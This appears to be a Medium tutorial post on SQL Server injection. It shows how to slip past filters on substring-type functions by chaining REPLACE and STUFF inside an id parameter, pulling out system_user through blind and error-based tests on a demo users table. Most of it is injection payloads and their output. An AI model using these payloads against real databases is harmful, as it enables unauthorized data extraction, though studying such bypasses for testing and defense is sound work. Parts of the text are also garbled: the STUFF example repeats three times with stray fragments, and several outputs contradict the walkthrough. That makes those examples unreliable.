Introduction to SQL Server Injection

SQL Server Smart Functions

The problem is encountered while working on a project in the company, the target has injection, But there are filters that filter separately

and, or, left, right, substring
  • The site filters the commonly used string truncation functions left, right, substring

Related Functions

Replace Function

Definition: REPLACE() Returns the string after replacing all occurrences of the specified string value in the original string with another string value.

Example

# replace all strings a with 1
1> select REPLACE('abcdef', 'a', '1');
2> go
+-------+
| |
+-------+
| 1bcdef |
+-------+
(1 rows affected)
# replace all strings b with 1
1> select REPLACE('abcdef', 'b', '1');
2> go
+-------+
| |
+-------+
| a1cdef |
+-------+
(1 rows affected)
# replace all strings ab with 1
1> select REPLACE('abcdef', 'ab', '1');
2> go
+-------+
| |
+-------+
| 1cdef |
+-------+
(1 rows affected)

STUFF Function

it is not a string intercept function, but we can use it as a string intercept function.

Example

sql server > select STUFF('abcde',1,0,'');
+--------------------------------+
| field1 |
+--------------------------------+
| abcde |
+--------------------------------+
1 row in set (0.00 sec)And this in
sql server > select STUFF('abcde',1,0,'');
+--------------------------------+
| field1 |
+--------------------------------+
| abcde |
+--------------------------------+
1 row in set (0.00 sec)And this in
sql server > select STUFF('abcde',1,0,'');
+--------------------------------+
| field1 |
+--------------------------------+
| abcde |
+--------------------------------+
1 row in set (0.00 sec)And this in

Example

after looking at the examples of the previous two functions, you may be able to guess how I will operate here!
Yes, I want to combine them to replace the string intercept function

# data to inject
1> select system_user;
2> go
+----+
| |
+----+
| sa |
+----+
(1 rows affected)
# test data
1> select * from users;
2> go
+----+-------------+------------+
| id | username | password |
+----+-------------+------------+
| 1 | test-user-01 | 123456 |
| 2 | test-user-02 | 234567 |
| 3 | testaa | 4444 |
+----+-------------+------------+
(3 rows affected)
1> select * from users where id=2;
2> go
+-----+--------------+-----------+
| id | username | password |
+-----+--------------+-----------+
| 2 | test-user-02 | 234567 |
+-----+--------------+-----------+
(1 rows affected)

Obtain The Length of System_User Data

you can obtain the length of a data in this way.

Error

1> select * from users where id=2-REPLACE(STUFF(system_user,10,0,''),system_user,0);
2> go
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
+----+----------+-----------+
(0 rows affected)
1> select * from users where id=2-REPLACE(STUFF(system_user,3,0,''),system_user,0);
2> go
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
+----+----------+-----------+
(0 rows affected)

Error-2

1> select * from users where id=2-REPLACE(STUFF(system_user,2,0,''),system_user,0);
2> go
+--------+------------+-----------+
| id | username | password |
+--------+------------+-----------+
| 2 | test-user-02 | 234567
+--------+------------+-----------+
(1 rows affected)

If the value of id = 2 is returned, the length of system_user is 2.

system_user II bit Data

Error

1> select * from users where id=2-REPLACE(STUFF(system_user,1,1,''),'b',0);
2> go
22018 - [SQL Server]Failed converting nvarchar value 'a' to data type int.

Error-2

1> select * from users where id=2-REPLACE(STUFF(system_user,1,1,''),'a',0);
2> go
+-----+--------------+-----------+
| id | username | password |
+-----+--------------+-----------+
| 2 | test-user-02 | 234567 |
+-----+--------------+-----------+
(1 rows affected)

system_user one bit Data

Error

1> select * from users where id=2-REPLACE(STUFF(system_user,1,0,''),'fa',0);
2> go
22018 - [SQL Server]Failed converting nvarchar value 'o' to data type int.

Error-2

1> select * from users where id=2-REPLACE(STUFF(system_user,1,0,''),'sa',0)
2> go
+-----+--------------+-----------+
| id | username | password |
+-----+--------------+-----------+
| 2 | test-user-02 | 234567 |
+-----+--------------+-----------+
(1 rows affected)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
TutorialBoy

TutorialBoy

Our mission is to get you into information security. We'll introduce you to penetration testing and Red Teaming. We cover network testing, Active Directory.